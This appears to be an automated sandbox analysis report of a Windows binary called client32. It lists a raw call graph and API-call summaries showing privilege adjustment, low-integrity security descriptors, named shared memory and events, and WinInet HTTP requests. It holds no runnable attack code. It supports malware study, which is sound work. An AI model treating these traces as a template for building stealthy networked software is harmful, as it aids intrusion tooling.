83323->83333 83425 1116cd5f 83323->83425 83324 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83325 11165e4b 83324->83325 83325->83301 83328 1116ed72 __invoke_watson 10 API calls 83328->83332 83330 1116cd5f _strcpy_s 66 API calls 83330->83332 83332->83328 83332->83330 83332->83333 83382 1116593d 83332->83382 
83389 11174bcc 83332->83389 83434 11165a5c 66 API calls 3 library calls 83332->83434 83435 111699f9 66 API calls _sprintf 83332->83435 83333->83324 83336 1116c675 __getptd 66 API calls 83335->83336 83337 11165e7a 83336->83337 83338 11165c2c __expandlocale 96 API calls 83337->83338 83342 11165ea2 _setlocale _strlen 83338->83342 83339 11165ea9 83340 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83339->83340 83341 11165eb7 83340->83341 83341->83301 83342->83339 83343 1116ac39 __malloc_crt 66 API calls 83342->83343 83344 11165ef3 _memmove 83343->83344 83344->83339 83345 1116cd5f _strcpy_s 66 API calls 83344->83345 83351 11165f66 _memmove 83345->83351 83346 11166155 83347 1116ed72 __invoke_watson 10 API calls 83346->83347 83348 11166186 83347->83348 83349 111661b0 83348->83349 83356 111661cb 83348->83356 83352 111661ba 83349->83352 83355 11165e4d __setlocale_set_cat 100 API calls 83349->83355 83350 111662f5 83350->83352 83463 11165ac7 70 API calls 6 library calls 83350->83463 83351->83346 83369 1116606a _memcmp 83351->83369 83461 11174ea4 79 API calls 2 library calls 83351->83461 83360 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83352->83360 83353 1116631c 83357 11165c2c __expandlocale 96 API calls 83353->83357 83355->83352 83356->83350 83356->83353 83373 11166200 _strpbrk _strncmp _strcspn _strlen 83356->83373 83368 11166331 _setlocale 83357->83368 83358 111660f0 83362 11163aa5 _free 66 API calls 83358->83362 83359 11166121 83359->83346 83363 1116612d InterlockedDecrement 83359->83363 83364 111663a1 83360->83364 83362->83339 83363->83346 83365 11166145 83363->83365 83364->83301 83366 11163aa5 _free 66 API calls 83365->83366 83367 1116614d 83366->83367 83370 11163aa5 _free 66 API calls 83367->83370 83368->83350 83368->83352 83371 11165e4d __setlocale_set_cat 100 API calls 83368->83371 83369->83358 83369->83359 83370->83346 83371->83368 83373->83350 83373->83352 83374 1116630e 83373->83374 83376 11165e4d 
__setlocale_set_cat 100 API calls 83373->83376 83462 111699f9 66 API calls _sprintf 83373->83462 83375 1116ed72 __invoke_watson 10 API calls 83374->83375 83375->83352 83376->83373 83377->83310 83464 1116ec49 83378->83464 83381->83303 83384 11165956 _memset 83382->83384 83383 11165985 _strcspn 83386 11165962 83383->83386 83387 1116ed72 __invoke_watson 10 API calls 83383->83387 83437 111699f9 66 API calls _sprintf 83383->83437 83384->83383 83384->83386 83436 111699f9 66 API calls _sprintf 83384->83436 83386->83332 83387->83383 83390 1116c675 __getptd 66 API calls 83389->83390 83394 11174bd9 83390->83394 83391 11174be6 GetUserDefaultLCID 83407 11174c6d 83391->83407 83392 11174c10 83395 11174c78 83392->83395 83397 11174c22 83392->83397 83394->83391 83394->83392 83448 1117463f 85 API calls _LangCountryEnumProc@4 83394->83448 83395->83391 83400 11174c83 _strlen 83395->83400 83399 11174c36 83397->83399 83401 11174c2d 83397->83401 83453 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 83399->83453 83406 11174c89 EnumSystemLocalesA 83400->83406 83449 11174b29 83401->83449 83403 11174cde 83408 11174d03 IsValidCodePage 83403->83408 83415 11174dae 83403->83415 83405 11174c34 83405->83407 83454 1117463f 85 API calls _LangCountryEnumProc@4 83405->83454 83406->83407 83407->83415 83438 111746a1 83407->83438 83410 11174d15 IsValidLocale 83408->83410 83408->83415 83410->83415 83418 11174d28 83410->83418 83411 11174c54 83411->83407 83412 11174c6f 83411->83412 83413 11174c66 83411->83413 83455 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 83412->83455 83416 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 83413->83416 83415->83332 83416->83407 83417 11174d79 GetLocaleInfoA 83417->83415 83419 11174d8a GetLocaleInfoA 83417->83419 83418->83415 83418->83417 83420 1116cd5f _strcpy_s 66 API calls 83418->83420 83419->83415 83421 11174d9e 83419->83421 83422 11174d66 83420->83422 83456 1116c308 66 API calls _xtoa_s@20 83421->83456 83422->83419 83424 1116ed72 __invoke_watson 10 API 
calls 83422->83424 83424->83417 83426 1116cd74 83425->83426 83427 1116cd6d 83425->83427 83458 1116a1af 66 API calls __getptd_noexit 83426->83458 83427->83426 83431 1116cd92 83427->83431 83429 1116cd79 83459 1116edc4 11 API calls _sprintf 83429->83459 83432 1116cd83 83431->83432 83460 1116a1af 66 API calls __getptd_noexit 83431->83460 83432->83332 83434->83332 83435->83332 83436->83383 83437->83383 83439 111746fb GetLocaleInfoW 83438->83439 83440 111746ab _setlocale 83438->83440 83441 11174717 83439->83441 83447 111746ea 83439->83447 83440->83439 83443 111746c1 _setlocale 83440->83443 83442 1117471d GetACP 83441->83442 83441->83447 83442->83403 83444 111746d2 GetLocaleInfoW 83443->83444 83445 111746ef 83443->83445 83444->83447 83457 11163c91 79 API calls __wcstoi64 83445->83457 83447->83403 83448->83392 83450 11174b30 _GetPrimaryLen _strlen 83449->83450 83451 11174b66 EnumSystemLocalesA 83450->83451 83452 11174b80 83451->83452 83452->83405 83453->83405 83454->83411 83455->83407 83456->83415 83457->83447 83458->83429 83459->83432 83460->83429 83461->83369 83462->83373 83463->83352 83465 1116ec68 _memset __call_reportfault 83464->83465 83466 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 83465->83466 83469 1116ed54 __call_reportfault 83466->83469 83467 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83468 1116ed70 GetCurrentProcess TerminateProcess 83467->83468 83468->83303 83469->83467 83472 111436a6 83470->83472 83471 11143763 83471->83054 83472->83471 83477 11081d30 83472->83477 83474 111436cb 83475 11081d30 IsDBCSLeadByte 83474->83475 83476 111436fb _memmove 83475->83476 83476->83054 83478 11081d3c 83477->83478 83480 11081d41 std::_Mutex::_Mutex __mbschr_l 83477->83480 83481 11081c50 IsDBCSLeadByte 83478->83481 83480->83474 83481->83480 83483 11142e6a 83482->83483 83484 11142e6c 83482->83484 83483->83069 83485 11110230 std::_Mutex::_Mutex 265 API calls 83484->83485 83486 11142e92 83485->83486 83487 
11142eb9 83486->83487 83489 11142e9b _strncpy 83486->83489 83494 11029a70 265 API calls 2 library calls 83487->83494 83489->83069 83495 11061970 83491->83495 83506 11061290 83495->83506 83499 110619cc 83500 11061a08 83499->83500 83504 11061320 274 API calls 83499->83504 83553 11061170 83500->83553 83504->83499 83507 111101b0 std::_Mutex::_Mutex 265 API calls 83506->83507 83508 110612ac 83507->83508 83509 110612f5 83508->83509 83510 110612b3 83508->83510 83565 1116305a 66 API calls std::exception::_Copy_str 83509->83565 83558 1105ee10 83510->83558 83513 110612eb 83517 11061320 83513->83517 83514 11061304 83566 111634b1 RaiseException 83514->83566 83516 11061319 83518 11061635 83517->83518 83522 11061355 83517->83522 83518->83499 83519 11061624 83520 1105ee10 68 API calls 83519->83520 83520->83518 83521 110614b4 83521->83519 83550 11061542 std::ios_base::_Ios_base_dtor 83521->83550 83567 110611e0 266 API calls 83521->83567 83522->83521 83524 11061401 RegEnumValueA 83522->83524 83525 11061389 RegQueryInfoKeyA 83522->83525 83526 1106149c 83524->83526 83539 11061435 83524->83539 83527 110613c2 83525->83527 83528 110613ae 83525->83528 83531 11163aa5 _free 66 API calls 83526->83531 83532 110613e2 83527->83532 83572 11029a70 265 API calls 2 library calls 83527->83572 83571 11029a70 265 API calls 2 library calls 83528->83571 83529 11081d30 IsDBCSLeadByte 83529->83539 83534 110614a9 83531->83534 83533 11163a11 _malloc 66 API calls 83532->83533 83536 110613f0 83533->83536 83534->83521 83536->83524 83537 110614e6 83537->83550 83568 11145bc0 83537->83568 83538 1106146e RegEnumValueA 83538->83526 83538->83539 83539->83529 83539->83538 83551 11061649 std::ios_base::_Ios_base_dtor 83539->83551 83573 11081e70 83539->83573 83540 110615a0 83540->83550 83585 11029a70 265 API calls 2 library calls 83540->83585 83542 11146a90 268 API calls 83542->83550 83546 11081d30 IsDBCSLeadByte 83546->83550 83550->83519 83550->83540 83550->83542 83550->83546 83550->83551 83552 11081e70 86 API calls 
83550->83552 83551->83499 83552->83550 83554 1105ee10 68 API calls 83553->83554 83555 110611a3 83554->83555 83595 110608e0 83555->83595 83559 1105ee21 LeaveCriticalSection 83558->83559 83560 1105ee2b 83558->83560 83559->83560 83561 1105ee3f 83560->83561 83562 11163aa5 _free 66 API calls 83560->83562 83563 1105ee85 83561->83563 83564 1105ee49 EnterCriticalSection 83561->83564 83562->83561 83563->83513 83564->83513 83565->83514 83566->83516 83567->83537 83586 111434c0 83568->83586 83574 11081e7d 83573->83574 83575 11081e82 83573->83575 83593 11081c50 IsDBCSLeadByte 83574->83593 83577 11081e8b 83575->83577 83581 11081e9f 83575->83581 83594 1116558e 85 API calls 2 library calls 83577->83594 83579 11081e98 83579->83539 83580 11081f03 83580->83539 83581->83580 83582 11166654 85 API calls std::_Mutex::_Mutex 83581->83582 83582->83581 83587 111434d0 83586->83587 83587->83587 83588 11110230 std::_Mutex::_Mutex 265 API calls 83587->83588 83593->83575 83594->83579 83596 110608f4 83595->83596 83602 1106092c 83595->83602 83596->83602 83610->83079 83612 11124fd1 InitializeCriticalSection 83611->83612 83614 11124ffe GetCurrentThreadId 83612->83614 83616 11125035 83614->83616 83617 1112503c 83614->83617 83701 1110fff0 InterlockedIncrement 83616->83701 83659 11160b10 InterlockedIncrement 83617->83659 83657->83088 83660 11160b27 CreateCompatibleDC 83659->83660 83661 11160b22 83659->83661 83663 11160b4c SelectPalette SelectPalette 83660->83663 83664 11160b38 83660->83664 83734 11160a60 272 API calls std::_Mutex::_Mutex 83661->83734 83736 11160750 265 API calls 83663->83736 83735 11029a70 265 API calls 2 library calls 83664->83735 83667 11160b73 83737 11160750 265 API calls 83667->83737 83670 11160b80 83671 11160b93 83670->83671 83672 11160c4e 83670->83672 83738 111606e0 265 API calls 2 library calls 83671->83738 83749 11160750 265 API calls 83672->83749 83701->83617 83734->83660 83736->83667 83737->83670 84771->83138 84772->83143 84773 11116880 84791 11145ef0 84773->84791 84776 
111168c5 84777 111168a8 84776->84777 84778 111168d4 CoInitialize CoCreateInstance 84776->84778 84779 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 84777->84779 84781 11116904 LoadLibraryA 84778->84781 84782 111168f9 84778->84782 84783 111168b6 84779->84783 84780 11145c70 std::_Mutex::_Mutex 90 API calls 84780->84776 84781->84782 84784 11116920 GetProcAddress 84781->84784 84785 111169e1 CoUninitialize 84782->84785 84786 111169e7 84782->84786 84787 11116930 SHGetSettings 84784->84787 84788 11116944 FreeLibrary 84784->84788 84785->84786 84789 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 84786->84789 84787->84788 84788->84782 84790 111169f6 84789->84790 84792 11145c70 std::_Mutex::_Mutex 90 API calls 84791->84792 84793 1111689e 84792->84793 84793->84776 84793->84777 84793->84780 84794 1102ebd0 84795 1102ec13 84794->84795 84796 111101b0 std::_Mutex::_Mutex 265 API calls 84795->84796 84797 1102ec1a 84796->84797 84799 1102ec3a 84797->84799 85856 11143630 84797->85856 84800 11143780 86 API calls 84799->84800 84801 1102ec64 84800->84801 84802 1102ec91 84801->84802 84803 11081e70 86 API calls 84801->84803 84805 11143780 86 API calls 84802->84805 84804 1102ec76 84803->84804 84806 11081e70 86 API calls 84804->84806 84807 1102ecba 84805->84807 84806->84802 84808 11163ca7 std::_Mutex::_Mutex 79 API calls 84807->84808 84813 1102ecc7 84807->84813 84808->84813 84809 1102ecf6 84810 1102ed68 84809->84810 84811 1102ed4f GetSystemMetrics 84809->84811 84816 1102ed82 CreateEventA 84810->84816 84811->84810 84812 1102ed5e 84811->84812 84815 11147060 std::_Mutex::_Mutex 21 API calls 84812->84815 84813->84809 84814 11145c70 std::_Mutex::_Mutex 90 API calls 84813->84814 84814->84809 84815->84810 84817 1102ed95 84816->84817 84818 1102eda9 84816->84818 85864 11029a70 265 API calls 2 library calls 84817->85864 84819 111101b0 std::_Mutex::_Mutex 265 API calls 84818->84819 84821 1102edb0 84819->84821 84822 1102edd0 84821->84822 
89009->89010 89011 1116a387 89010->89011 89012 1116a401 89010->89012 89067 1116e390 HeapCreate 89011->89067 89013 1116a462 89012->89013 89021 1116a407 89012->89021 89015 1116a467 89013->89015 89016 1116a4c0 89013->89016 89017 1116c4ba ___set_flsgetvalue 3 API calls 89015->89017 89019 1116a390 __close 89016->89019 89161 1116c7be 79 API calls __freefls@4 89016->89161 89022 1116a46c 89017->89022 89018 1116a38c 89018->89019 89068 1116c82c GetModuleHandleW 89018->89068 89019->88998 89020 1116a425 89025 1116a439 89020->89025 89156 1117226e 67 API calls _free 89020->89156 89021->89019 89021->89020 89155 1116e65b 66 API calls _doexit 89021->89155 89027 1116ac7e __calloc_crt 66 API calls 89022->89027 89159 1116a44c 70 API calls __mtterm 89025->89159 89031 1116a478 89027->89031 89028 1116a39c __RTC_Initialize 89032 1116a3a0 89028->89032 89040 1116a3ac GetCommandLineA 89028->89040 89031->89019 89034 1116a484 DecodePointer FlsSetValue 89031->89034 89152 1116e3ae HeapDestroy 89032->89152 89033 1116a42f 89157 1116c50b 70 API calls _free 89033->89157 89037 1116a4b4 89034->89037 89038 1116a49d 89034->89038 89042 11163aa5 _free 66 API calls 89037->89042 89160 1116c548 66 API calls 4 library calls 89038->89160 89039 1116a434 89158 1116e3ae HeapDestroy 89039->89158 89093 11177e54 GetEnvironmentStringsW 89040->89093 89042->89019 89045 1116a4a4 GetCurrentThreadId 89045->89019 89049 1116a3ca 89153 1116c50b 70 API calls _free 89049->89153 89053 1116a3ea 89053->89019 89154 1117226e 67 API calls _free 89053->89154 89059 111104e0 89058->89059 89060 11110501 89059->89060 89061 111104ec 89059->89061 89062 11110514 ___DllMainCRTStartup 89059->89062 89178 11110430 89060->89178 89061->89062 89064 11110430 ___DllMainCRTStartup 7 API calls 89061->89064 89062->89001 89066 111104f5 89064->89066 89065 11110508 89065->89001 89066->89001 89067->89018 89069 1116c840 89068->89069 89070 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 89068->89070 89162 1116c50b 70 API calls _free 
89069->89162 89074 1116c893 TlsAlloc 89070->89074 89073 1116c845 89073->89028 89075 1116c9a2 89074->89075 89076 1116c8e1 TlsSetValue 89074->89076 89075->89028 89076->89075 89077 1116c8f2 89076->89077 89163 1116e417 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 89077->89163 89079 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 89164 11174425 InitializeCriticalSectionAndSpinCount 89079->89164 89081 1116c936 89082 1116c99d 89081->89082 89083 1116c93a DecodePointer 89081->89083 89166 1116c50b 70 API calls _free 89082->89166 89085 1116c94f 89083->89085 89085->89082 89086 1116ac7e __calloc_crt 66 API calls 89085->89086 89087 1116c965 89086->89087 89087->89082 89088 1116c96d DecodePointer 89087->89088 89089 1116c97e 89088->89089 89089->89082 89090 1116c982 89089->89090 89165 1116c548 66 API calls 4 library calls 89090->89165 89092 1116c98a GetCurrentThreadId 89092->89075 89097 11177e70 WideCharToMultiByte 89093->89097 89099 1116a3bc 89093->89099 89095 11177ea5 89098 1116ac39 __malloc_crt 66 API calls 89095->89098 89096 11177edd FreeEnvironmentStringsW 89096->89099 89097->89095 89097->89096 89100 11177eab 89098->89100 89106 11172029 GetStartupInfoW 89099->89106 89100->89096 89101 11177eb3 WideCharToMultiByte 89100->89101 89102 11177ec5 89101->89102 89103 11177ed1 FreeEnvironmentStringsW 89101->89103 89104 11163aa5 _free 66 API calls 89102->89104 89103->89099 89105 11177ecd 89104->89105 89105->89103 89107 1116ac7e __calloc_crt 66 API calls 89106->89107 89108 11172047 89107->89108 89108->89108 89110 1116ac7e __calloc_crt 66 API calls 89108->89110 89112 1116a3c6 89108->89112 89114 1117213c 89108->89114 89115 111721bc 89108->89115 89109 111721f2 GetStdHandle 89109->89115 89110->89108 89111 11172256 SetHandleCount 89111->89112 89112->89049 89119 11177d99 89112->89119 89113 11172204 GetFileType 89113->89115 89114->89115 89116 11172173 InitializeCriticalSectionAndSpinCount 89114->89116 89117 11172168 GetFileType 89114->89117 
89115->89109 89115->89111 89115->89113 89118 1117222a InitializeCriticalSectionAndSpinCount 89115->89118 89116->89112 89116->89114 89117->89114 89117->89116 89118->89112 89118->89115 89120 11177db3 GetModuleFileNameA 89119->89120 89121 11177dae 89119->89121 89123 11177dda 89120->89123 89173 11171a45 94 API calls __setmbcp 89121->89173 89167 11177bff 89123->89167 89125 1116a3d6 89125->89053 89130 11177b23 89125->89130 89127 1116ac39 __malloc_crt 66 API calls 89128 11177e1c 89127->89128 89128->89125 89129 11177bff _parse_cmdline 76 API calls 89128->89129 89129->89125 89131 11177b2c 89130->89131 89134 11177b31 _strlen 89130->89134 89175 11171a45 94 API calls __setmbcp 89131->89175 89133 1116ac7e __calloc_crt 66 API calls 89139 11177b66 _strlen 89133->89139 89134->89133 89137 1116a3df 89134->89137 89135 11177bb5 89136 11163aa5 _free 66 API calls 89135->89136 89136->89137 89137->89053 89146 1116e46e 89137->89146 89138 1116ac7e __calloc_crt 66 API calls 89138->89139 89139->89135 89139->89137 89139->89138 89140 11177bdb 89139->89140 89142 1116cd5f _strcpy_s 66 API calls 89139->89142 89143 11177bf2 89139->89143 89141 11163aa5 _free 66 API calls 89140->89141 89141->89137 89142->89139 89144 1116ed72 __invoke_watson 10 API calls 89143->89144 89145 11177bfe 89144->89145 89147 1116e47c __IsNonwritableInCurrentImage 89146->89147 89176 1116d88b EncodePointer 89147->89176 89149 1116e49a __initterm_e 89151 1116e4bb __IsNonwritableInCurrentImage 89149->89151 89177 11163dd5 76 API calls __cinit 89149->89177 89151->89053 89152->89019 89153->89032 89154->89049 89155->89020 89156->89033 89157->89039 89158->89025 89159->89019 89160->89045 89161->89019 89162->89073 89163->89079 89164->89081 89165->89092 89166->89075 89168 11177c1e 89167->89168 89172 11177c8b 89168->89172 89174 11177590 76 API calls x_ismbbtype_l 89168->89174 89170 11177d89 89170->89125 89170->89127 89171 11177590 76 API calls __splitpath_helper 89171->89172 89172->89170 89172->89171 89173->89120 89174->89168 89175->89134 
89176->89149 89177->89151 89179 11110474 EnterCriticalSection 89178->89179 89180 1111045f InitializeCriticalSection 89178->89180 89182 11110495 89179->89182 89180->89179 89181 111104c3 LeaveCriticalSection 89181->89065 89182->89181 89183 111103d0 ___DllMainCRTStartup 4 API calls 89182->89183 89183->89182 89184 11030b78 89185 11143630 267 API calls 89184->89185 89186 11030b86 89185->89186 89187 11143780 86 API calls 89186->89187 89188 11030bc3 89187->89188 89189 11030bd8 89188->89189 89190 11081e70 86 API calls 89188->89190 89191 110ed520 8 API calls 89189->89191 89190->89189 89192 11030bff 89191->89192 89193 11030c49 89192->89193 89252 110ed5d0 81 API calls 2 library calls 89192->89252 89197 11143780 86 API calls 89193->89197 89195 11030c14 89253 110ed5d0 81 API calls 2 library calls 89195->89253 89199 11030c60 89197->89199 89198 11030c2b 89198->89193 89200 11146fe0 19 API calls 89198->89200 89201 111101b0 std::_Mutex::_Mutex 265 API calls 89199->89201 89200->89193 89202 11030c6f 89201->89202 89203 11030c90 89202->89203 89204 11088b30 268 API calls 89202->89204 89205 1108a880 267 API calls 89203->89205 89204->89203 89206 11030ca3 OpenMutexA 89205->89206 89207 11030cc3 CreateMutexA 89206->89207 89208 11030dda CloseHandle 89206->89208 89209 11030ce3 89207->89209 89245 1108a980 89208->89245 89211 111101b0 std::_Mutex::_Mutex 265 API calls 89209->89211 89213 11030cf8 89211->89213 89212 11030df0 89215 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 89212->89215 89214 11030d1b 89213->89214 89216 11061710 293 API calls 89213->89216 89235 110161e0 LoadLibraryA 89214->89235 89218 11031773 89215->89218 89216->89214 89219 11030d2d 89220 11145c70 std::_Mutex::_Mutex 90 API calls 89219->89220 89221 11030d3c 89220->89221 89222 11030d49 89221->89222 89223 11030d5c 89221->89223 89236 111466b0 89222->89236 89225 11030d66 GetProcAddress 89223->89225 89226 11030d50 89223->89226 89225->89226 89227 11030d80 SetLastError 89225->89227 89228 110287a0 47 API 
calls 89226->89228 89227->89226 89229 11030d8d 89228->89229 89254 11009370 431 API calls std::_Mutex::_Mutex 89229->89254 89231 11030d9c 89232 11030db0 WaitForSingleObject 89231->89232 89232->89232 89233 11030dc2 CloseHandle 89232->89233 89233->89208 89234 11030dd3 FreeLibrary 89233->89234 89234->89208 89235->89219 89237 11145c70 std::_Mutex::_Mutex 90 API calls 89236->89237 89238 111466c2 89237->89238 89239 11146700 89238->89239 89240 111466c9 LoadLibraryA 89238->89240 89239->89226 89241 111466fa 89240->89241 89242 111466db GetProcAddress 89240->89242 89241->89226 89243 111466f3 FreeLibrary 89242->89243 89244 111466eb 89242->89244 89243->89241 89244->89243 89246 1108aa27 89245->89246 89250 1108a9ba std::ios_base::_Ios_base_dtor 89245->89250 89247 1108aa2e DeleteCriticalSection 89246->89247 89255 1115c2d0 89247->89255 89248 1108a9ce CloseHandle 89248->89250 89250->89246 89250->89248 89251 1108aa54 std::ios_base::_Ios_base_dtor 89251->89212 89252->89195 89253->89198 89254->89231 89258 1115c2e4 89255->89258 89256 1115c2e8 89256->89251 89258->89256 89259 1115c040 67 API calls 2 library calls 89258->89259 89259->89258

                                                                              Control-flow Graph: function at 1109E5B0 (graph listing not reproduced)
                                                                              APIs
                                                                                • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,EE49F673,00080000,00000000,?), ref: 1109D88D
                                                                                • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,EE49F673,00080000,00000000,?), ref: 1109E645
                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                              • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                              • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                              • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                              • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                              • GetLastError.KERNEL32 ref: 1109E75D
                                                                              • LocalFree.KERNEL32(?), ref: 1109E786
                                                                              • LocalFree.KERNEL32(?), ref: 1109E793
                                                                              • GetLastError.KERNEL32 ref: 1109E7B0
                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                              • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                              • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                              • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                              • LocalFree.KERNEL32(?), ref: 1109E908
                                                                              • _memset.LIBCMT ref: 1109E920
                                                                              • GetTickCount.KERNEL32 ref: 1109E928
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                              • GetLastError.KERNEL32 ref: 1109EA44
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                              • GetLastError.KERNEL32 ref: 1109EA89
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                              • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                              • GetLastError.KERNEL32 ref: 1109EACF
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                              • GetLastError.KERNEL32 ref: 1109EB1A
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                              • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                              • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                              • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists

                                                                              Control-flow Graph: function at 11029BB0 (graph listing not reproduced)
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(WinInet.dll,EE49F673,759223A0,?,00000000), ref: 11029BE5
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                              • _malloc.LIBCMT ref: 11029CB7
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                              • GetLastError.KERNEL32 ref: 11029CF2
                                                                              • _free.LIBCMT ref: 11029CFE
                                                                              • _malloc.LIBCMT ref: 11029D07
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                              • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                              • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                              • _free.LIBCMT ref: 11029DA5
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                              • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                              • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                              • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                              • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                              • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                              • InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
